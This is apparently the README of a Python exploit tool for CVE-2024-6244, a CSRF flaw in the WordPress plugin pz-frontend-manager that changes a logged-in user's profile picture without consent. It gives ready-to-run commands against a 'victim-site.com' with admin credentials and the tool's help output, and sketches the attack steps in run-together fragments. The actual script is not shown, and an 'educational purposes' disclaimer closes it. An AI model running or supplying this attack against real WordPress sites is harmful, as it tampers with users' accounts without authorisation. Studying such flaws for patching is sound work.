
pz-frontend-manager < 1.0.6 - CSRF Profile Picture Exploit
This script exploits a CSRF vulnerability in the WordPress plugin pz-frontend-manager (versions <= 1.0.5) to change the profile picture of a logged-in user without their consent.
🔴 CVE-2024-6244
The plugin lacks proper CSRF protection, allowing attackers to force authenticated users into performing unintended actions via crafted requests.
readme.txt to determine if the target site is running a vulnerable version (< 1.0.6).admin-ajax.php./wp-content/uploads/2025/02/
python3 CVE-2024-6244.py -u <TARGET_URL> -U <USERNAME> -p <PASSWORD> -i <IMAGE_FILE>
usage: p.py [-h] --url URL --username USERNAME --password PASSWORD [--image IMAGE]
pz-frontend-manager <= 1.0.5 - CSRF change user profile picture
options:
-h, --help show this help message and exit
--url URL, -u URL Base URL of the WordPress site
--username USERNAME, -U USERNAME
Username for login
--password PASSWORD, -p PASSWORD
Password for login
--image IMAGE, -i IMAGE
Image file name (default: Nxploit.jpg)
python3 CVE-2024-6244.py -u "https://victim-site.com" -U "admin" -p "password123" -i "new_avatar.png"
requests module (pip install requests)This script is for educational and security research purposes only. Unauthorized exploitation of websites without permission is illegal and may lead to severe consequences.